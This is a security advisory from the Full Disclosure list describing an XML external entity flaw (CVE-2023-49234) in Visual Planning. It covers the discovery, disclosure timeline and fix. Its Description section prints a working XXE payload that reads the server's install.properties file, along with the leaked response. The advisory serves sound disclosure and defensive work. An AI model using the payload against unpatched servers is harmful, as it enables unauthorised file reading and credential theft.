-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Title =====SCHUTZWERK-SA-2023-006: Arbitrary File Read via XML External Entities in Visual Planning
Status ====== PUBLISHED Version ======= 1.0 CVE reference ============= CVE-2023-49234 Link ==== https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-006/ Text-only version: https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-006.txt Affected products/vendor ======================== All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T. Summary =======Authenticated attackers can exploit a weakness in the XML parser functionality of the Visual Planning[0] application in order to obtain read access to arbitrary files on the application server. Depending on configured access permissions, this vulnerability could be used by an attacker to exfiltrate secrets stored on the local file system.
Risk ====An attacker can use the vulnerability to gather information and depending on the stored data, exfiltrate secrets from the file system. Furthermore, HTTP requests can be used for out-of-bands exfiltration and possibly server side request forgery (SSRF) attacks.
Description ===========During a recent red teaming assessment, Visual Planning was identified as part of the customers internet-facing assets. The software is developed by STILOG I.S.T. and provides resource management and scheduling features. A security assessment conducted by SCHUTZWERK found an arbitrary file read vulnerability via XML external entities in Visual Planning. The application Admin Center (vpadmin) communicates with the server through an XML-based protocol that utilizes proprietary compression methods and is transmitted via HTTP. SCHUTZWERK implemented a custom proxy as part of an assessment in order to intercept and manipulate the messages exchanged between application and server.
One of the messages sent by the Admin Center application after authentication is the following:
<?xml version="1.0" encoding="UTF-8"?> <com.visualplanning.query.parameters.GetApplicationProperty> <defaultValue> </defaultValue> <propertyName>PWD</propertyName> <rawResult>false</rawResult> <section>INSTALLDATA</section> <userSession isNull="true"/> </com.visualplanning.query.parameters.GetApplicationProperty>The method GetApplicationProperty is called to request the value of the property PWD. The server responds with an XML message, where the value element contains the response of the query:
<?xml version="1.0" encoding="UTF-8"?> <com.visualplanning.query.result.ApplicationPropertyResult> <resultValues/> <status>OK</status> <value> </value> </com.visualplanning.query.result.ApplicationPropertyResult>In this response it was observed that if the requested property value could not be resolved, the content of the request element defaultValue will be reflected as part of the response, making it a suitable back channel for XML external entity (XXE) injections.
The following message was sent to the Visual Planning application: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY example SYSTEM "C:\xampp2\tomcat\webapps\vplanning\configuration\install.properties"> ]>
<com.visualplanning.query.parameters.GetApplicationProperty> <defaultValue>&example;</defaultValue> <propertyName>ShowBackground</propertyName> <rawResult>false</rawResult> <section>Application</section> <userSession isNull="true"/> </com.visualplanning.query.parameters.GetApplicationProperty>The server responds with the content of the requested install.properties file inside the value element, thus confirming the XML parser is vulnerable to XML external entity (XXE) injections:
<?xml version="1.0" encoding="UTF-8"?> <com.visualplanning.query.result.ApplicationPropertyResult> <resultValues/> <status>OK</status> <value># #Tue Oct 03 15:37:33 CEST 2023 INSTALLDATA.INSTALLSERIAL= INSTALLDATA.INSTALLURL=http\://127.0.0.1\:8080/vplanning INSTALLDATA.OK=Next INSTALLDATA.PAGE=PROVIDER INSTALLDATA.POOLMODE=1 INSTALLDATA.PORT=3306 INSTALLDATA.PROVIDERTYPE=MySQL INSTALLDATA.PWD=ENCODE\: INSTALLDATA.SERVER=127.0.0.1 INSTALLDATA.SERVERLANG=de INSTALLDATA.USER=root INSTALLDATA.VIEWERSERIAL= </value> </com.visualplanning.query.result.ApplicationPropertyResult>Further testing showed that out-of-bands exfiltration via HTTPS requests is also generally possible.
Solution/Mitigation =================== The vendor suggests to update to Visual Planning 8 (Build 240207) Disclosure timeline =================== 2023-11-01: Vulnerability discovered 2023-11-09: Contact vendor in order to determine security contact 2023-11-10: Received generic sales response from vendor 2023-11-14: Contacted CTO of vendor directly 2023-11-16: Vulnerabilities demonstrated in call with contact at vendor 2023-11-24: CVE assigned by Mitre 2023-11-24: Additional technical details provided to vendor2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings is in progress 2024-01-30: Inquired about mitigation status regarding the reported vulnerabilities 2024-01-30: Vendor informed SCHUTZWERK that some of the issues were already fixed
2024-03-08: Sent advisory drafts to vendor 2024-03-28: Received patch information and release of advisory Contact/Credits ===============The vulnerability was discovered during an assessment by Lennert Preuth and David Brown of SCHUTZWERK GmbH.
References ========== [0] https://www.visual-planning.com/en/ Disclaimer ==========The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The most recent version of this security advisory can be found at SCHUTZWERK GmbH's website ( https://www.schutzwerk.com ).
Additional information ====================== SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/ SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/ -----BEGIN PGP SIGNATURE----- iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0bcaHGFkdmlzb3Jp ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsdwA/+MyfbZTe36+AYi9q6GJE6 S75Xm2aZtEM3NC5F6aMcELqFEW7LNjERmBoqfkHe+SWfgFxeCXl/XelHaNnR7HTM ZZPCGwJmOI+XaraInPVdCDw1QVIdiCG4VZzE0tlnFbLBgM+OTOxcDOoG7OhzP6mm ALfankzxu3AfbZhwebQtSXIQ+YqjitTsvjQGPleylqYK5CJbChsyvmMjomu/GzdO sWQ25ODCVUy6VORet8yn5OkQnM2CjSkteuTdNxCzd6JUB+vQ0g5FCE5NVzkqYq21 YJ4Fc3PgkyAnrGefSbueL+Z/K6btM8RysJAwGahIEOdlkG8W/p09L0QQUGERT2VN UO6oTi/1OyoJBV9L5umr6aHss3P92ln90UAUW2dlZOdGSB8rlXisxLC1wtFZAXH9 YwiGY/ACXmV1FtQQpgFxfNRyEWaltU5S0Y0bPAaW+ABSMLlK4X0Ft9E/4s4Yel2d TGngEnVKcR/PKNtrJbBqPDwt98R0MdQi0QxBRaxGxAg4Yr1qex8ph6IRT7bDTm0/ 1CKlQL7y9uvXlnFE4CO3IkKNp0ejKn3A7QEep4jit07VItIc+sRsoMnB6v54DoML ZfIisDoijb3doTNieyMpgTGZTDWLwLO36IS9JiqafNCAnngExqylFX6vYQVggtRz mZ2yA2/9ZfQwOawEirQtQr8= =TUGM -----END PGP SIGNATURE----- -- SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany Zertifiziert / Certified ISO 27001, 9001 and TISAX Phone +49 731 977 191 0 advisories () schutzwerk com / www.schutzwerk.com Geschäftsführer / Managing Directors: Jakob Pietzka, Michael Schäfer Amtsgericht Ulm / HRB 727391 Datenschutz / Data Protection www.schutzwerk.com/datenschutz
Attachment:
OpenPGP_signature.asc
Description: OpenPGP digital signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/